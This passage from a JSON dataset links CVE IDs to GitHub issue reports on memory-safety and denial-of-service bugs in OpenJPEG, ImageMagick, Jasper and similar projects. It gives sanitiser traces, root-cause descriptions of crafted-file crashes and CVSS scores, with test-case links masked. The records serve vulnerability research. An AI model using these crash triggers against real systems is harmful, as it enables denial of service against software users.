APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7bec9d0 in APITAG splay APITAG NUMBERTAG f1fe7bed NUMBERTAG c in APITAG splay APITAG NUMBERTAG f1fe7b NUMBERTAG fdc in APITAG APITAG NUMBERTAG f1fe7a NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG cb in APITAG APITAG NUMBERTAG f1fe7ec4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG df NUMBERTAG in posix_memalign APITAG NUMBERTAG f1fe7bd7d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7bd NUMBERTAG c in APITAG APITAG NUMBERTAG f1fe NUMBERTAG db5f7 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG da8ec in APITAG APITAG NUMBERTAG f1fe7a4b6b1 in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG c in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG df NUMBERTAG in posix_memalign APITAG NUMBERTAG f1fe7bd7d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7bd NUMBERTAG c in APITAG APITAG NUMBERTAG f1fe NUMBERTAG fbe NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a4b NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG c in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG df NUMBERTAG in posix_memalign APITAG NUMBERTAG f1fe7bd7d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7bd NUMBERTAG c in APITAG APITAG NUMBERTAG f1fe NUMBERTAG fbd NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a4b NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG c in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG df NUMBERTAG in posix_memalign APITAG NUMBERTAG f1fe7a9ecb2 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG fbf5e in APITAG APITAG NUMBERTAG f1fe NUMBERTAG fbab4 in APITAG APITAG NUMBERTAG f1fe7a4b NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG c in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG df NUMBERTAG in posix_memalign APITAG NUMBERTAG f1fe7bd7d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7bd NUMBERTAG c in APITAG APITAG NUMBERTAG f1fe7beddc6 in APITAG splay APITAG NUMBERTAG f1fe7b2a NUMBERTAG a in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe6e NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG df NUMBERTAG in posix_memalign APITAG NUMBERTAG f1fe7bd7d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7bd NUMBERTAG c in APITAG APITAG NUMBERTAG f1fe7beddc6 in APITAG splay APITAG NUMBERTAG f1fe NUMBERTAG d0efd in APITAG APITAG NUMBERTAG f1fe NUMBERTAG bdc0 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG e2b in APITAG APITAG NUMBERTAG f1fe NUMBERTAG e8 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe6e NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a9eed8 in APITAG APITAG NUMBERTAG f1fe7c NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7bed NUMBERTAG in APITAG splay APITAG NUMBERTAG f1fe7b NUMBERTAG fdc in APITAG APITAG NUMBERTAG f1fe7a NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG cb in APITAG APITAG NUMBERTAG f1fe7ec4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7bec9d0 in APITAG splay APITAG NUMBERTAG f1fe7b2c NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe6e NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7bec9d0 in APITAG splay APITAG NUMBERTAG f1fe NUMBERTAG d0fb4 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG bdc0 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG e2b in APITAG APITAG NUMBERTAG f1fe NUMBERTAG e8 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe6e NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7bec9d0 in APITAG splay APITAG NUMBERTAG f1fe7bed NUMBERTAG c in APITAG splay APITAG NUMBERTAG f1fe NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG cb in APITAG APITAG NUMBERTAG f1fe7ec4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7bec9d0 in APITAG splay APITAG NUMBERTAG f1fe7b2c NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c0d3 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe6e NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a9eed8 in APITAG APITAG NUMBERTAG f1fe7c NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7b2c3f3 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c0d3 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe6e NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a9eed8 in APITAG APITAG NUMBERTAG f1fe7c NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7b2c3f3 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe6e NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a9eed8 in APITAG APITAG NUMBERTAG f1fe7c NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7bed7e1 in APITAG splay APITAG NUMBERTAG f1fe7b NUMBERTAG fdc in APITAG APITAG NUMBERTAG f1fe7a NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG cb in APITAG APITAG NUMBERTAG f1fe7ec4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a9eed8 in APITAG APITAG NUMBERTAG f1fe7c NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7b2c3e3 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe6e NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a9eed8 in APITAG APITAG NUMBERTAG f1fe7c NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7b2c3e3 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c0d3 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe6e NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a9eed8 in APITAG APITAG NUMBERTAG f1fe7c NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7bed7e1 in APITAG splay APITAG NUMBERTAG f1fe NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG cb in APITAG APITAG NUMBERTAG f1fe7ec4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a9eed8 in APITAG APITAG NUMBERTAG f1fe7c NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG d0f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG bdc0 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG e2b in APITAG APITAG NUMBERTAG f1fe NUMBERTAG e8 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe6e NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). \u00b7\u00b7\u00b7 POC: URLTAG Credit : APITAG of Venustech",
  8641. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8642. "severity": "MEDIUM",
  8643. "baseScore": 6.5,
  8644. "impactScore": 3.6,
  8645. "exploitabilityScore": 2.8
  8646. },
  8647. {
  8648. "CVE_ID": "CVE-2017-14151",
  8649. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/982",
  8650. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/982",
  8651. "Repo_new": "uclouvain/openjpeg",
  8652. "Issue_Created_At": "2017-08-14T11:17:11Z",
  8653. "description": "heap base buffer overflow in opj_mqc_flush (mqc.c). On NUMBERTAG ERRORTAG Testcase: URLTAG",
  8654. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  8655. "severity": "HIGH",
  8656. "baseScore": 8.8,
  8657. "impactScore": 5.9,
  8658. "exploitabilityScore": 2.8
  8659. },
  8660. {
  8661. "CVE_ID": "CVE-2017-14152",
  8662. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/985",
  8663. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/985",
  8664. "Repo_new": "uclouvain/openjpeg",
  8665. "Issue_Created_At": "2017-08-15T08:11:05Z",
  8666. "description": "heap based buffer overflow in opj_write_bytes_LE (cio.c). On NUMBERTAG ERRORTAG Testcase: URLTAG",
  8667. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  8668. "severity": "HIGH",
  8669. "baseScore": 8.8,
  8670. "impactScore": 5.9,
  8671. "exploitabilityScore": 2.8
  8672. },
  8673. {
  8674. "CVE_ID": "CVE-2017-14164",
  8675. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/991",
  8676. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/991",
  8677. "Repo_new": "uclouvain/openjpeg",
  8678. "Issue_Created_At": "2017-08-16T14:30:54Z",
  8679. "description": "heap based buffer overflow in opj_write_bytes_LE (cio.c) (unfixed NUMBERTAG On master: ERRORTAG Testcase: URLTAG",
  8680. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  8681. "severity": "HIGH",
  8682. "baseScore": 8.8,
  8683. "impactScore": 5.9,
  8684. "exploitabilityScore": 2.8
  8685. },
  8686. {
  8687. "CVE_ID": "CVE-2017-14172",
  8688. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/715",
  8689. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/715",
  8690. "Repo_new": "imagemagick/imagemagick",
  8691. "Issue_Created_At": "2017-08-31T14:37:10Z",
  8692. "description": "denial of service APITAG issue in APITAG in coders/ps.c. Hello all. We found a denial of service APITAG issue in Imagemagick NUMBERTAG Q NUMBERTAG which can cause huge CPU and memory consumption. Note that this issue is quite similar to issue NUMBERTAG we have reported. The vulnerable code is shown as below. ERRORTAG A crafted PS image file, which claims large length but does not contain sufficient backing data, would cause a large loop at line NUMBERTAG since there is no EOF check inside. APITAG FILETAG The command we was using is APITAG In our tests we used a machine with Intel(R) Xeon(R) CPU E NUMBERTAG GHz NUMBERTAG CPU cores and NUMBERTAG GB RAM. This issue caused NUMBERTAG CPU and up to NUMBERTAG GB RAM consumption. This process lasted for about NUMBERTAG minutes. Note that this issue was found by Xiaohei and Wangchu from Alibaba Security Team. Thanks.",
  8693. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8694. "severity": "MEDIUM",
  8695. "baseScore": 6.5,
  8696. "impactScore": 3.6,
  8697. "exploitabilityScore": 2.8
  8698. },
  8699. {
  8700. "CVE_ID": "CVE-2017-14173",
  8701. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/713",
  8702. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/713",
  8703. "Repo_new": "imagemagick/imagemagick",
  8704. "Issue_Created_At": "2017-08-31T12:43:45Z",
  8705. "description": "An Infinite loop issue in APITAG coders/txt.c. Hello all. We found an infinite loop issue in Imagemagick NUMBERTAG Q NUMBERTAG The vulnerable code is shown as below. APITAG An integer overflow might happen for the addition operation APITAG when a crafted TXT file, which claims large max_value , is provided. APITAG FILETAG In our poc, we set max_value as NUMBERTAG L The command we was using is APITAG Note that this issue was found by Xiaohei and Wangchu from Alibaba Security Team. Thanks.",
  8706. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8707. "severity": "MEDIUM",
  8708. "baseScore": 6.5,
  8709. "impactScore": 3.6,
  8710. "exploitabilityScore": 2.8
  8711. },
  8712. {
  8713. "CVE_ID": "CVE-2017-14174",
  8714. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/714",
  8715. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/714",
  8716. "Repo_new": "imagemagick/imagemagick",
  8717. "Issue_Created_At": "2017-08-31T14:06:02Z",
  8718. "description": "denial of service APITAG issue in APITAG in coders/psd.c. Hello all. We found a denial of service APITAG issue in Imagemagick NUMBERTAG Q NUMBERTAG which can cause huge CPU consumption. Note that this issue is quite similar to issue NUMBERTAG we have reported. The vulnerable code is shown as below. ERRORTAG A crafted PSD image file, which claims large length but does not contain sufficient backing data, would cause a large loop at line NUMBERTAG since there is no EOF check inside. APITAG FILETAG The command we was using is APITAG In our tests we used a machine with Intel(R) Xeon(R) CPU E NUMBERTAG GHz NUMBERTAG CPU cores and NUMBERTAG GB RAM. This issue caused NUMBERTAG CPU for more than NUMBERTAG and a half minutes. Note that this issue was found by Xiaohei and Wangchu from Alibaba Security Team. Thanks.",
  8719. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8720. "severity": "MEDIUM",
  8721. "baseScore": 6.5,
  8722. "impactScore": 3.6,
  8723. "exploitabilityScore": 2.8
  8724. },
  8725. {
  8726. "CVE_ID": "CVE-2017-14175",
  8727. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/712",
  8728. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/712",
  8729. "Repo_new": "imagemagick/imagemagick",
  8730. "Issue_Created_At": "2017-08-31T12:18:01Z",
  8731. "description": "denial of service APITAG issue in APITAG in coders/xbm.c. Hello all. We found a denial of service APITAG issue in Imagemagick NUMBERTAG Q NUMBERTAG which can cause huge CPU and memory consumption. These issues are quite similar to the bugs we have found in APITAG ( CVETAG , CVETAG and CVETAG ). The vulnerable code is shown as below. ERRORTAG A crafted XBM image file, which claims large image >rows and image >columns but does not contain sufficient backing data, would cause a large and heavy loop at line NUMBERTAG since there is no EOF check inside. APITAG FILETAG The command we was using is APITAG In our tests we used a machine with Intel(R) Xeon(R) CPU E NUMBERTAG GHz NUMBERTAG CPU cores and NUMBERTAG GB RAM. This issue caused NUMBERTAG CPU and up to NUMBERTAG GB memory consumption. Note that this process lasted for more than NUMBERTAG minutes. Note that this issue was found by Xiaohei and Wangchu from Alibaba Security Team.",
  8732. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8733. "severity": "MEDIUM",
  8734. "baseScore": 6.5,
  8735. "impactScore": 3.6,
  8736. "exploitabilityScore": 2.8
  8737. },
  8738. {
  8739. "CVE_ID": "CVE-2017-14181",
  8740. "Issue_Url_old": "https://github.com/teknoraver/aacplusenc/issues/1",
  8741. "Issue_Url_new": "https://github.com/teknoraver/aacplusenc/issues/1",
  8742. "Repo_new": "teknoraver/aacplusenc",
  8743. "Issue_Created_At": "2017-08-31T07:21:22Z",
  8744. "description": "NULL pointer dereference in APITAG (bitbuffer.c). On NUMBERTAG ERRORTAG Testcase: URLTAG",
  8745. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  8746. "severity": "HIGH",
  8747. "baseScore": 7.8,
  8748. "impactScore": 5.9,
  8749. "exploitabilityScore": 1.8
  8750. },
  8751. {
  8752. "CVE_ID": "CVE-2017-14224",
  8753. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/733",
  8754. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/733",
  8755. "Repo_new": "imagemagick/imagemagick",
  8756. "Issue_Created_At": "2017-09-06T02:18:32Z",
  8757. "description": "Heap buffer overflow in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A heap buffer overflow vulnerability was found in function APITAG in APITAG allow attackers to cause a denial of service or remote code execution via a crafted file. ./magick convert NUMBERTAG im2pcx out.pcx CODETAG testcase: URLTAG Note that this issue was found by lifuhao from Aliyun Security Team. Thanks",
  8758. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  8759. "severity": "HIGH",
  8760. "baseScore": 8.8,
  8761. "impactScore": 5.9,
  8762. "exploitabilityScore": 2.8
  8763. },
  8764. {
  8765. "CVE_ID": "CVE-2017-14229",
  8766. "Issue_Url_old": "https://github.com/mdadams/jasper/issues/146",
  8767. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/146",
  8768. "Repo_new": "jasper-software/jasper",
  8769. "Issue_Created_At": "2017-08-31T08:39:34Z",
  8770. "description": "Infinite loop in jpc_dec.c of Jasper.. version: Summary: There is an infinite loop in jpc_dec.c of Jasper. Description: The gdb debugging information is listed below: (gdb) set args POC NUMBERTAG gdb) r The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: PATHTAG f PATHTAG FILETAG",
  8771. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  8772. "severity": "HIGH",
  8773. "baseScore": 7.5,
  8774. "impactScore": 3.6,
  8775. "exploitabilityScore": 3.9
  8776. },
  8777. {
  8778. "CVE_ID": "CVE-2017-14230",
  8779. "Issue_Url_old": "https://github.com/cyrusimap/cyrus-imapd/issues/2132",
  8780. "Issue_Url_new": "https://github.com/cyrusimap/cyrus-imapd/issues/2132",
  8781. "Repo_new": "cyrusimap/cyrus-imapd",
  8782. "Issue_Created_At": "2017-08-31T05:05:14Z",
  8783. "description": "Broken Ohter Users behaviour in NUMBERTAG Gabriele Bulfon < EMAILTAG > reported this issue on the mailing list: ERRORTAG",
  8784. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  8785. "severity": "CRITICAL",
  8786. "baseScore": 9.1,
  8787. "impactScore": 5.2,
  8788. "exploitabilityScore": 3.9
  8789. },
  8790. {
  8791. "CVE_ID": "CVE-2017-14231",
  8792. "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/78",
  8793. "Issue_Url_new": "https://github.com/semplon/genixcms/issues/78",
  8794. "Repo_new": "semplon/genixcms",
  8795. "Issue_Created_At": "2017-08-07T05:58:15Z",
